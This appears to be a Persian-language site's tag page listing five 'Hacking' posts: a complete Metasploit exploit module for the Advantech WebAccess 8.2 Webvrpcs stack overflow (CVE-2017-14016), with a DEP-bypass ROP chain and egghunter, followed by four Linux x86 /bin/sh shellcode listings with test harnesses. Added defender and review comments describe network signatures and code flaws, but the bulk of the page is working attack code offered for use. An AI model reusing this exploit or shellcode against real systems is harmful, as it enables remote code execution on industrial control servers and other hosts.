در حال نمایش نتایج برای برچسب های 'opcode'.



5 نتیجه پیدا شد

  ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2017-14016 / ZDI-17-938: a stack buffer overflow in the
# Advantech WebAccess 8.2 "Webvrpcs" DCERPC service.  The vendor advisory
# referenced below (ICSA-17-306-02) is the authoritative source for the fix.
#
# Defender notes, all derived from the request that #exploit builds:
#   - Network signature: a DCERPC bind to interface UUID
#     5d2b62aa-ee0a-4a95-91ae-b064fdb471fc over ncacn_ip_tcp (default port 4592),
#     a call to opnum 0x4, then a call to opnum 0x1 whose body carries an
#     opcode field of 0x000138bd (decimal 80061, the opcode in 'Name') and a
#     0x1000-byte string with both size fields set to 0x1000.
#   - The target process has DEP enabled (see the comment in #create_rop_chain),
#     so the module relies on gadgets at hard-coded addresses in BwKrlAPI.dll and
#     BwPAlarm.dll.  Those fixed addresses imply the modules load at predictable
#     bases on the listed target -- not verifiable from this file, but it is why
#     DEP alone does not stop the module.  Patching per the advisory is the fix.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Egghunter

  # Module metadata.  'Privileged' => true declares that a successful run
  # yields elevated rights; the declaration is the author's, not verifiable here.
  # The single target carries three return addresses used by #exploit:
  # 'Ret' (stack pivot), 'Slide' (a bare retn) and 'Jmp' (pop/pop/ret).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Advantech WebAccess Webvrpcs Service Opcode 80061 Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in Advantech WebAccess 8.2.
        By sending a specially crafted DCERPC request, an attacker could overflow
        the buffer and execute arbitrary code.
      },
      'Author'         => [ 'mr_me <mr_me[at]offensive-security[dot]com>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'ZDI', '17-938' ],
          [ 'CVE', '2017-14016' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02' ]
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 2048,
          'BadChars' => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 7 x86 - Advantech WebAccess 8.2-2017.03.31',
            {
              'Ret'   => 0x07036cdc, # pop ebx; add esp, 994; retn 0x14
              'Slide' => 0x07048f5b, # retn
              'Jmp'   => 0x0706067e  # pop ecx; pop ecx; ret 0x04
            }
          ],
        ],
      'DisclosureDate' => 'Nov 02 2017',
      'DefaultTarget'  => 0))

    # Only option beyond the defaults: the Webvrpcs service port.
    register_options([ Opt::RPORT(4592)])
  end

  # Builds the DEP-bypass ROP chain and returns it as a binary String of
  # little-endian DWORDs ("V*").  Each gadget's disassembly and host module are
  # given in the per-entry comments (author's annotations).  The
  # rand_text_alpha(4).unpack('V') entries are filler consumed by gadgets that
  # adjust ESP; unpack returns a one-element Array, hence the .flatten before
  # packing.
  def create_rop_chain()
    # this target opts into dep
    rop_gadgets =
    [
      0x020214c6, # POP EAX # RETN [BwKrlAPI.dll]
      0x0203a134, # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]
      0x02032fb4, # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll]
      0x070738ee, # XCHG EAX,ESI # RETN [BwPAlarm.dll]
      0x0201a646, # POP EBP # RETN [BwKrlAPI.dll]
      0x07024822, # & push esp # ret [BwPAlarm.dll]
      0x070442dd, # POP EAX # RETN [BwPAlarm.dll]
      0xffffffff, # Value to negate, will become 0x00000001
      0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
      0x0704de61, # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll]
      rand_text_alpha(4).unpack('V'),
      rand_text_alpha(4).unpack('V'),
      rand_text_alpha(4).unpack('V'),
      0x02030af7, # POP EAX # RETN [BwKrlAPI.dll]
      0xfbdbcbd5, # put delta into eax (-> put 0x00001000 into edx)
      0x02029003, # ADD EAX,424442B # RETN [BwKrlAPI.dll]
      0x0201234a, # XCHG EAX,EDX # RETN [BwKrlAPI.dll]
      0x07078df5, # POP EAX # RETN [BwPAlarm.dll]
      0xffffffc0, # Value to negate, will become 0x00000040
      0x070467d2, # NEG EAX # RETN [BwPAlarm.dll]
      0x07011e60, # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll]
      0x0706fe66, # POP EDI # RETN [BwPAlarm.dll]
      rand_text_alpha(4).unpack('V'),
      rand_text_alpha(4).unpack('V'),
      0x0703d825, # RETN (ROP NOP) [BwPAlarm.dll]
      0x0202ca65, # POP EAX # RETN [BwKrlAPI.dll]
      0x90909090, # nop
      0x07048f5a, # PUSHAD # RETN [BwPAlarm.dll]
    ].flatten.pack("V*")
    return rop_gadgets
  end

  # Main entry point.  Sequence on the wire: connect, DCERPC bind to the
  # Webvrpcs interface, opnum 0x4 to obtain a 32-bit handle, then opnum 0x1
  # carrying that handle, the opcode, two size fields and a 0x1000-byte
  # buffer.  The buffer is laid out as return-address chain, ROP chain,
  # egghunter, egg, random padding.  NoResponse from the final call is treated
  # as expected (the service is not expected to answer once overflowed) and the
  # socket is always closed in ensure.  The local variable `handle` is reused
  # for two different things (the DCERPC handle String, then the numeric
  # service handle), which is worth renaming for clarity.
  def exploit
    connect
    handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    # send the request to get the handle
    # Last 4 bytes of the response are taken as the little-endian handle; no
    # length check is done on resp before .last(4).
    resp = dcerpc.call(0x4, [0x02000000].pack('V'))
    handle = resp.last(4).unpack('V').first
    print_good("Got a handle: 0x%08x" % handle)

    # NOTE(review): "0day" is the egg tag the hunter searches memory for; how
    # the tag is encoded in the buffer is defined by Msf::Exploit::Egghunter,
    # not here -- confirm there before using it as a detection string.
    egg_options = { :eggtag => "0day" }
    egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options)

    # apparently this is called a ret chain
    # 6 x Slide, Jmp, Ret, 6 x Slide, all from the target hash in #initialize.
    overflow = [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Jmp']].pack('V')
    overflow << [target['Ret']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << create_rop_chain()
    overflow << egghunter
    overflow << egg
    # Pad to exactly 0x1000 bytes; raises ArgumentError (negative size) if the
    # chain plus payload ever exceeds 0x1000, which is not guarded here.
    overflow << rand_text_alpha(0x1000-overflow.length)

    # sorry but I dont like msf's ndr class.
    # Hand-packed request body: handle, opcode, copy size, string size, data.
    sploit = [handle].pack('V')
    sploit << [0x000138bd].pack('V') # opcode we are attacking
    sploit << [0x00001000].pack('V') # size to copy
    sploit << [0x00001000].pack('V') # size of string
    sploit << overflow

    print_status("Trying target #{target.name}...")
    begin
      dcerpc_call(0x1, sploit)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
      # Deliberately swallowed: no reply is the expected outcome here.
    ensure
      disconnect
    end
    handler
  end
end
  2. Hacking

    /*
 * lnx_binsh2.c - v1 - 45 Byte /bin/sh sysenter Opcode Array Payload
 *
 * Copyright(c) 2005 c0ntex <c0ntex@open-security.org>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

/*
 * Tested: fedora core 3
 *
 * execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80
 *
 * (gdb) disas __kernel_vsyscall
 * Dump of assembler code for function __kernel_vsyscall:
 * 0xffffe400 <__kernel_vsyscall+0>:    push   %ecx
 * 0xffffe401 <__kernel_vsyscall+1>:    push   %edx
 * 0xffffe402 <__kernel_vsyscall+2>:    push   %ebp
 * 0xffffe403 <__kernel_vsyscall+3>:    mov    %esp,%ebp
 * 0xffffe405 <__kernel_vsyscall+5>:    sysenter
 * 0xffffe407 <__kernel_vsyscall+7>:    nop
 * 0xffffe408 <__kernel_vsyscall+8>:    nop
 * 0xffffe409 <__kernel_vsyscall+9>:    nop
 * 0xffffe40a <__kernel_vsyscall+10>:   nop
 * 0xffffe40b <__kernel_vsyscall+11>:   nop
 * 0xffffe40c <__kernel_vsyscall+12>:   nop
 * 0xffffe40d <__kernel_vsyscall+13>:   nop
 * 0xffffe40e <__kernel_vsyscall+14>:   jmp    0xffffe403 <__kernel_vsyscall+3>
 * 0xffffe410 <__kernel_vsyscall+16>:   pop    %ebp
 * 0xffffe411 <__kernel_vsyscall+17>:   pop    %edx
 * 0xffffe412 <__kernel_vsyscall+18>:   pop    %ecx
 * 0xffffe413 <__kernel_vsyscall+19>:   ret
 * 0xffffe414 <__kernel_vsyscall+20>:   add    %al,(%eax)
 * 0xffffe416 <__kernel_vsyscall+22>:   add    %al,(%eax)
 * 0xffffe418 <__kernel_vsyscall+24>:   add    %al,(%eax)
 * 0xffffe41a <__kernel_vsyscall+26>:   add    %al,(%eax)
 * 0xffffe41c <__kernel_vsyscall+28>:   add    %al,(%eax)
 * 0xffffe41e <__kernel_vsyscall+30>:   add    %al,(%eax)
 * End of assembler dump.
 * (gdb) q
 *
 * so we replace int $0x80 instruction with
 *
 *    push %ecx
 *    push %edx
 *    push %ebp
 *    mov %esp,%ebp
 *    sysenter
 *
 * which does make the shellcode slightly larger :/
 *
 *  804807a:   51                      push   %ecx
 *  804807b:   52                      push   %edx
 *  804807c:   55                      push   %ebp
 *  804807d:   89 e5                   mov    %esp,%ebp
 *  804807f:   0f 34                   sysenter
 */

/* Calling: execve(/bin/sh), exit(0) */

/*
 * Review notes on the test harness (the code below the payload array):
 *  - grab_esp() has no return statement; it relies on whatever the inline
 *    asm left in %eax being taken as the return value.  That is undefined
 *    behaviour in C and only happens to work with an unoptimised 32-bit
 *    cdecl build -- presumably the author compiled with -O0.
 *  - main() casts the address of a writable char array to a function
 *    pointer and calls it.  This can only run where the data segment is
 *    executable; on a toolchain/kernel that enforces non-executable data
 *    (NX / W^X) the call faults, which is precisely the mitigation such a
 *    harness demonstrates when it fails.
 *  - The fprintf format strings use %x for an unsigned long and for
 *    pointers, and %d for a size_t; the values print but the types do not
 *    match (%p / %zu would be correct).
 *  - _exit() is called without including <unistd.h>, so it is implicitly
 *    declared.
 *  - The while(pointer) condition never changes; the loop ends only because
 *    pointer() does not return (execve replaces the process image, per the
 *    "Calling:" comment above).  If the call ever returned it would spin.
 */

#include <stdio.h>

typedef char wikkid;

/* 45-byte payload; sizeof() includes the terminating NUL, hence the -1 below. */
wikkid oPc0d3z[] =
"\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
"\x0b\x51\x52\x55\x89\xe5\x0f\x34"
"\x31\xc0\x31\xdb\xfe\xc0\x51\x52"
"\x55\x89\xe5\x0f\x34";

/* Returns the current stack pointer via %eax; no C return statement (see notes). */
unsigned long grab_esp()
{
    __asm__("movl %esp,%eax");
}

int main(void)
{
    unsigned long delta;
    void (*pointer)();

    delta = grab_esp();
    fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta);
    fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)-1);

    /* Data array treated as code: requires an executable data segment. */
    pointer=(void*)&oPc0d3z;

    while(pointer) {
        fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer);
        fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+45);
        pointer();
    }
    _exit(0);
}
  3. Hacking

    /*
 * lnx_binsh3.c - v1 - 27 Byte /bin/sh sysenter Opcode Array Payload
 *
 * Copyright(c) 2005 c0ntex <c0ntex@open-security.org>
 * Copyright(c) 2005 amnesia <amnesia@anomalistic.org>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

/*
 * Tested: fedora core 3 - c0ntex
 *         debian SID    - amnesia
 *
 * execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80
 *
 * (gdb) disas __kernel_vsyscall
 * Dump of assembler code for function __kernel_vsyscall:
 * 0xffffe400 <__kernel_vsyscall+0>:    push   %ecx
 * 0xffffe401 <__kernel_vsyscall+1>:    push   %edx
 * 0xffffe402 <__kernel_vsyscall+2>:    push   %ebp
 * 0xffffe403 <__kernel_vsyscall+3>:    mov    %esp,%ebp
 * 0xffffe405 <__kernel_vsyscall+5>:    sysenter
 * 0xffffe407 <__kernel_vsyscall+7>:    nop
 * 0xffffe408 <__kernel_vsyscall+8>:    nop
 * 0xffffe409 <__kernel_vsyscall+9>:    nop
 * 0xffffe40a <__kernel_vsyscall+10>:   nop
 * 0xffffe40b <__kernel_vsyscall+11>:   nop
 * 0xffffe40c <__kernel_vsyscall+12>:   nop
 * 0xffffe40d <__kernel_vsyscall+13>:   nop
 * 0xffffe40e <__kernel_vsyscall+14>:   jmp    0xffffe403 <__kernel_vsyscall+3>
 * 0xffffe410 <__kernel_vsyscall+16>:   pop    %ebp
 * 0xffffe411 <__kernel_vsyscall+17>:   pop    %edx
 * 0xffffe412 <__kernel_vsyscall+18>:   pop    %ecx
 * 0xffffe413 <__kernel_vsyscall+19>:   ret
 * 0xffffe414 <__kernel_vsyscall+20>:   add    %al,(%eax)
 * 0xffffe416 <__kernel_vsyscall+22>:   add    %al,(%eax)
 * 0xffffe418 <__kernel_vsyscall+24>:   add    %al,(%eax)
 * 0xffffe41a <__kernel_vsyscall+26>:   add    %al,(%eax)
 * 0xffffe41c <__kernel_vsyscall+28>:   add    %al,(%eax)
 * 0xffffe41e <__kernel_vsyscall+30>:   add    %al,(%eax)
 * End of assembler dump.
 * (gdb) q
 *
 * so we replace int $0x80 instruction with
 *
 *    push %ecx
 *    push %edx
 *    push %ebp
 *    mov %esp,%ebp
 *    sysenter
 *
 * which does make the shellcode slightly larger :/
 *
 *  804807a:   51                      push   %ecx
 *  804807b:   52                      push   %edx
 *  804807c:   55                      push   %ebp
 *  804807d:   89 e5                   mov    %esp,%ebp
 *  804807f:   0f 34                   sysenter
 *
 * $ ./lnx_binsh3
 *
 * [-] Stack Pointer found -> [0xbffff648]
 *     [-] Size of payload egg -> [27]
 *     [-] Payload Begin -> [0x804968c]
 *     [-] Payload End -> [0x80496b9]
 *
 * sh-2.05b$
 */

/* Calling: execve(/bin/sh), exit(0) */

/*
 * Review notes on the test harness (identical to lnx_binsh2.c apart from the
 * payload array and the +27 end-address arithmetic):
 *  - grab_esp() has no return statement; it relies on whatever the inline
 *    asm left in %eax being taken as the return value -- undefined behaviour
 *    in C that presumably only works with an unoptimised 32-bit cdecl build.
 *  - main() casts the address of a writable char array to a function
 *    pointer and calls it, so it needs an executable data segment; under
 *    NX / W^X enforcement the call faults.
 *  - fprintf uses %x for an unsigned long and for pointers and %d for a
 *    size_t; the format specifiers do not match the argument types.
 *  - _exit() is used without <unistd.h> (implicit declaration).
 *  - while(pointer) never changes its condition; it ends only because
 *    pointer() does not return (execve replaces the process image, per the
 *    "Calling:" comment above).
 */

#include <stdio.h>

typedef char wikkid;

/* reduced shellcode size from 45 to 27 - amnesia */
/* sizeof() includes the terminating NUL, hence the -1 in main(). */
wikkid oPc0d3z[] =
"\x31\xc0\x31\xdb\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
"\x0b\x0f\x34";

/* Returns the current stack pointer via %eax; no C return statement (see notes). */
unsigned long grab_esp()
{
    __asm__("movl %esp,%eax");
}

int main(void)
{
    unsigned long delta;
    void (*pointer)();

    delta = grab_esp();
    fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta);
    fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)-1);

    /* Data array treated as code: requires an executable data segment. */
    pointer=(void*)&oPc0d3z;

    while(pointer) {
        fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer);
        fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+27);
        pointer();
    }
    _exit(0);
}
  4. Hacking

    /*
 * lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
 *
 * Copyright(c) 2005 c0ntex <c0ntex@open-security.org>
 * Copyright(c) 2005 BaCkSpAcE <sinisa86@gmail.com>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

/*
 * Tested: fedora core 3 - c0ntex
 *         fedora core 4 - BaCkSpAcE
 *         debian SID    - amnesia
 *
 * execve("/bin/sh") using sysenter from __kernel_vsyscall appose to int $0x80
 *
 * (gdb) disas __kernel_vsyscall
 * Dump of assembler code for function __kernel_vsyscall:
 * 0xffffe400 <__kernel_vsyscall+0>:    push   %ecx
 * 0xffffe401 <__kernel_vsyscall+1>:    push   %edx
 * 0xffffe402 <__kernel_vsyscall+2>:    push   %ebp
 * 0xffffe403 <__kernel_vsyscall+3>:    mov    %esp,%ebp
 * 0xffffe405 <__kernel_vsyscall+5>:    sysenter
 * 0xffffe407 <__kernel_vsyscall+7>:    nop
 * 0xffffe408 <__kernel_vsyscall+8>:    nop
 * 0xffffe409 <__kernel_vsyscall+9>:    nop
 * 0xffffe40a <__kernel_vsyscall+10>:   nop
 * 0xffffe40b <__kernel_vsyscall+11>:   nop
 * 0xffffe40c <__kernel_vsyscall+12>:   nop
 * 0xffffe40d <__kernel_vsyscall+13>:   nop
 * 0xffffe40e <__kernel_vsyscall+14>:   jmp    0xffffe403 <__kernel_vsyscall+3>
 * 0xffffe410 <__kernel_vsyscall+16>:   pop    %ebp
 * 0xffffe411 <__kernel_vsyscall+17>:   pop    %edx
 * 0xffffe412 <__kernel_vsyscall+18>:   pop    %ecx
 * 0xffffe413 <__kernel_vsyscall+19>:   ret
 * 0xffffe414 <__kernel_vsyscall+20>:   add    %al,(%eax)
 * 0xffffe416 <__kernel_vsyscall+22>:   add    %al,(%eax)
 * 0xffffe418 <__kernel_vsyscall+24>:   add    %al,(%eax)
 * 0xffffe41a <__kernel_vsyscall+26>:   add    %al,(%eax)
 * 0xffffe41c <__kernel_vsyscall+28>:   add    %al,(%eax)
 * 0xffffe41e <__kernel_vsyscall+30>:   add    %al,(%eax)
 * End of assembler dump.
 * (gdb) q
 *
 * so we replace int $0x80 instruction with
 *
 *    push %ecx
 *    push %edx
 *    push %ebp
 *    mov %esp,%ebp
 *    sysenter
 *
 * which does make the shellcode slightly larger :/
 *
 *  804807a:   51                      push   %ecx
 *  804807b:   52                      push   %edx
 *  804807c:   55                      push   %ebp
 *  804807d:   89 e5                   mov    %esp,%ebp
 *  804807f:   0f 34                   sysenter
 *
 * $ ./lnx_binsh4
 *
 * [-] Stack Pointer found -> [0xbfe0f0d8]
 *     [-] Size of payload egg -> [23]
 *     [-] Payload Begin -> [0x80496c0]
 *     [-] Payload End -> [0x80496d7]
 *
 * sh-3.00b$
 */

/* Calling: execve(/bin/sh), exit(0) */

/*
 * Review notes on the test harness (same harness as lnx_binsh2.c/3.c with a
 * 23-byte payload and +23 end-address arithmetic):
 *  - grab_esp() has no return statement; it relies on whatever the inline
 *    asm left in %eax being taken as the return value -- undefined behaviour
 *    in C that presumably only works with an unoptimised 32-bit cdecl build.
 *  - main() casts the address of a writable char array to a function
 *    pointer and calls it, so it needs an executable data segment; under
 *    NX / W^X enforcement the call faults.
 *  - fprintf uses %x for an unsigned long and for pointers and %d for a
 *    size_t; the format specifiers do not match the argument types.
 *  - _exit() is used without <unistd.h> (implicit declaration).
 *  - while(pointer) never changes its condition; it ends only because
 *    pointer() does not return (execve replaces the process image, per the
 *    "Calling:" comment above).
 */

#include <stdio.h>

typedef char wikkid;

/* reduced shellcode size from 45 to 23 - BaCkSpAcE */
/* sizeof() includes the terminating NUL, hence the -1 in main(). */
wikkid oPc0d3z[] =
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x54"
"\x5b\x52\x53\x54\x59\x0f\x34";

/* Returns the current stack pointer via %eax; no C return statement (see notes). */
unsigned long grab_esp()
{
    __asm__("movl %esp,%eax");
}

int main(void)
{
    unsigned long delta;
    void (*pointer)();

    delta = grab_esp();
    fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta);
    fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)-1);

    /* Data array treated as code: requires an executable data segment. */
    pointer=(void*)&oPc0d3z;

    while(pointer) {
        fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer);
        fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+23);
        pointer();
    }
    _exit(0);
}
  5. Hacking

    /*
 * lnx_binsh4.c - v1 - 21 Byte /bin/sh Opcode Array Payload
 *
 * Copyright(c) 2004 c0ntex <c0ntex@open-security.org>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

/* Calling: execve(/bin/sh) */

/*
 * Review notes on this listing (the 2004 int $0x80 variant; note the header
 * reuses the file name lnx_binsh4.c although the 23-byte sysenter listing
 * above also calls itself lnx_binsh4.c):
 *  - As posted, the oPc0d3z initialiser has no terminating ';' before the
 *    grab_esp() definition, so this file does not compile without that fix.
 *  - sizeof(oPc0d3z) is printed without the -1 used in the other listings,
 *    so the "Size of payload egg" line reports 22 (the NUL terminator is
 *    counted) while the title says 21 bytes; pointer+21 is the real length.
 *  - The inline asm string in grab_esp() appears here without instruction
 *    separators (newlines or ';' between xorl / movl / movl); they were
 *    probably lost when the listing was reformatted -- gas needs them.
 *  - grab_esp() still has no C return statement and relies on %eax; main()
 *    still calls into a writable char array, which requires an executable
 *    data segment and faults under NX / W^X enforcement.
 *  - fprintf uses %x for an unsigned long and for pointers and %d for a
 *    size_t; _exit() is used without <unistd.h>.
 *  - Exit status here is _exit(0x01), unlike the 0 used in the other listings.
 */

#include <stdio.h>

typedef char wikkid;

/* 21-byte payload (no ';' after the literal as posted -- see notes). */
wikkid oPc0d3z[] =
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

/* Clears %eax/%ebx then leaves the stack pointer in %eax; no C return statement. */
unsigned long grab_esp()
{
    __asm__(" xorl %eax,%eax movl %eax,%ebx movl %esp,%eax ");
}

int main(void)
{
    unsigned long delta;
    void (*pointer)();

    delta = grab_esp();
    fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta);
    /* No -1 here: the printed size includes the terminating NUL (see notes). */
    fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z));

    /* Data array treated as code: requires an executable data segment. */
    pointer=(void*)&oPc0d3z;

    while(pointer) {
        fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer);
        fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+21);
        pointer();
    }
    _exit(0x01);
}